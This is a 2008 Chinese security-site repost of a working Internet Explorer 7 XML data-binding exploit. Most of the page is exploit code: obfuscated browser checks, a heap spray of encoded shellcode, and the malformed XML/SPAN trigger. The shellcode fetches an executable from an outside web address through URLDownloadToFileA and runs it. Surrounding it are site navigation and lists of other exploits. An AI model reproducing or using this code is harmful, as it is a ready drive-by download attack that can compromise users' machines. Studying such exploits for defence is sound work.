首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Internet Explorer 7.0 XML 0day
来源:http://www.friddy.cn 作者:friddy 发布时间:2008-12-11  
漏洞环境:
XP/2003+Internet Explorer 7.0

测试效果: 弹出计算器程序

评述:10月份就有人喊着卖了,据说当时价值12W RMB
<script language="javascript">

if(navigator.userAgent.toLowerCase().indexOf("\x6D\x73\x69\x65 \x37")==-1)
location.replace("\x61\x62\x6F\x75\x74\x3A\x62\x6C\x61\x6E\x6B");
</script>
<script>function sleep(milliseconds)
{
    var start = new Date().getTime();
    for (var i = 0; i < 1e7; i++) {
        if ((new Date().getTime() - start) > milliseconds)
        {              break;    
        }
    }
}
function spray(sc) {
var string1 = 0x0a0a0a0a;
var string1temp=unescape;
var shellcodesize = string1temp(sc);
var heapBlockSize = 0x100000; var payLoadSize = shellcodesize.length * 2;
var szlong = heapBlockSize -(payLoadSize+0x038);
var retVal = string1temp("%u0a0a%u0a0a");
retVal = getSampleValue(retVal,szlong);  
aaablk = (string1 - 0x100000)/heapBlockSize;  
zzchuck = new Array();    
for (i=0;i<aaablk;i++)
{      
zzchuck[i] = retVal + shellcodesize;
}
}  

function getSampleValue(retVal, szlong) {  
while(retVal.length*2<szlong)
{        
retVal += retVal; }    
retVal = retVal.substring(0,szlong/2);
return retVal;
}
var a1="%u";
spray("%u56e8%u0000%u5300%u5655%u8b57%u246c%u8b18%u3c45%u548b%u7805%uea01%u4a8b%u8b18%u205a%ueb01%u32e3%u8b49%u8b34%uee01%uff31%u31fc%uacc0%ue038%u0774%ucfc1%u010d%uebc7%u3bf2%u247c%u7514%u8be1%u245a%ueb01%u8b66%u4b0c%u5a8b%u011c%u8beb%u8b04%ue801%u02eb%uc031%u5e5f%u5b5d%u08c2%u5e00%u306a%u6459%u198b%u5b8b%u8b0c%u1c5b%u1b8b%u5b8b%u5308%u8e68%u0e4e%uffec%u89d6%u53c7%u8e68%u0e4e%uffec%uebd6%u5a50%uff52%u89d0%u52c2%u5352%uaa68%u0dfc%uff7c%u5ad6%u4deb%u5159%uff52%uebd0%u5a72%u5beb%u6a59%u6a00%u5100%u6a52%uff00%u53d0%ua068%uc9d5%uff4d%u5ad6%uff52%u53d0%u9868%u8afe%uff0e%uebd6%u5944%u006a%uff51%u53d0%u7e68%ue2d8%uff73%u6ad6%uff00%ue8d0%uffab%uffff%u7275%u6d6c%u6e6f%u642e%u6c6c%ue800%uffae%uffff%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%ue800%uffa0%uffff%u2e2e%u765c%ue800%uffb7%uffff%u2e2e%u765c%ue800%uff89%uffff%%u7468%u7074%u2f3a%u662f%u6972%u6464%u2e79%u6e63%u652f%u7078%u632f%u6c61%u2e63%u7865%u0065");
sleep(5000);
nav=navigator.userAgent.toLowerCase();
if (navigator.appVersion.indexOf('MSIE')!=-1)
{   version=parseFloat(navigator.appVersion.split('MSIE')[1])
}
if (version==7)
{  
w2k3 = ((nav.indexOf('windows nt 5.2')!=-1) || (nav.indexOf('windows 2003')!=-1));
wxp = ((nav.indexOf('windows nt 5.1')!=-1) || (nav.indexOf('windows xp')!=-1));  
  if (wxp||w2k3)    document.write('<XML ID=I><X><C><![CDATA[<image SRC=http://rਊr.test.com src=http://www.google.cn]]><![CDATA[>]]

></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>');    
  var i=1;  
while ( i <= 10 )  
{window.status=" ";i++; }
}  
</script>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MS Internet Explorer XML Parsi
·Exploits Multiple XSRF in DD-W
·eZ Publish < 3.9.5/3.10.1/4.0.
·eZ Publish 3.9.0/3.9.5/3.10.1
·Linux Kernel <= 2.6.27.8 ATMSV
·Internet Explorer 8.0 Beta 2 A
·MS Internet Explorer XML Parsi
·MS Visual Basic ActiveX Contro
·EasyMail ActiveX (emmailstore.
·Wysi Wiki Wyg 1.0 Remote Passw
·Vinagre < 2.24.2 show_error()
·linux x86 shellcode obfuscator
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved